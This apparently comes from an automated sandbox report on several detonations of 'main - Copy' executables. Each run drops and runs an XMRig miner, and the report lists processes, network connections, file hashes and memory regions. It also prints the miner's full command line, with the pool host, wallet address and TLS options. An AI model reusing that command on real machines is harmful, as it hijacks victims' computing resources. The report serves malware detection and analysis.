a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4476 wrote to memory of 2376 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4476 wrote to memory of 2376 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3960 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3464,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4592 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2376-16-0x00000249798B0000-0x00000249798D0000-memory.dmp
memory/2376-17-0x0000024A0D560000-0x0000024A0D580000-memory.dmp
memory/2376-18-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-19-0x0000024A0DBD0000-0x0000024A0DBF0000-memory.dmp
memory/2376-20-0x0000024A0D9A0000-0x0000024A0D9C0000-memory.dmp
memory/2376-21-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-22-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-25-0x0000024A0D9A0000-0x0000024A0D9C0000-memory.dmp
memory/2376-24-0x0000024A0DBD0000-0x0000024A0DBF0000-memory.dmp
memory/2376-23-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-26-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-27-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-28-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-29-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-30-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-31-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-32-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-33-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-34-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-35-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-36-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-37-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-38-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-39-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-40-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-41-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-42-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-43-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-44-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-45-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-46-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-47-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-48-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-49-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-50-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-51-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-52-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-53-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-54-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-55-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-56-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-57-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-58-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-59-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-60-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-61-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-62-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-63-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-64-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-65-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-66-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-67-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-68-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-69-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-70-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-71-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-72-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-73-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-74-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-75-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-76-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-77-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-78-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-79-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-80-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-81-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-82-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-83-0x00007FF632640000-0x00007FF633143000-memory.dmp
memory/2376-84-0x00007FF632640000-0x00007FF633143000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3124 wrote to memory of 3936 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3124 wrote to memory of 3936 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3936-16-0x0000022188640000-0x0000022188660000-memory.dmp
memory/3936-17-0x000002221A9F0000-0x000002221AA10000-memory.dmp
memory/3936-18-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-20-0x000002221B060000-0x000002221B080000-memory.dmp
memory/3936-19-0x000002221B040000-0x000002221B060000-memory.dmp
memory/3936-21-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-22-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-25-0x000002221B060000-0x000002221B080000-memory.dmp
memory/3936-24-0x000002221B040000-0x000002221B060000-memory.dmp
memory/3936-23-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-26-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-27-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-28-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-29-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-30-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-31-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-32-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-33-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-34-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-35-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-36-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-37-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-38-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-39-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-40-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-41-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-42-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-43-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-44-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-45-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-46-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-47-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-48-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-49-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-50-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-51-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-52-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-53-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-54-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-55-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-56-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-57-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-58-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-59-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-60-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-61-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-62-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-63-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-64-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-65-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-66-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-67-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-68-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-69-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-70-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-71-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-72-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-73-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-74-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-75-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-76-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-77-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-78-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-79-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-80-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-81-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-82-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-83-0x00007FF703B10000-0x00007FF704613000-memory.dmp
memory/3936-84-0x00007FF703B10000-0x00007FF704613000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
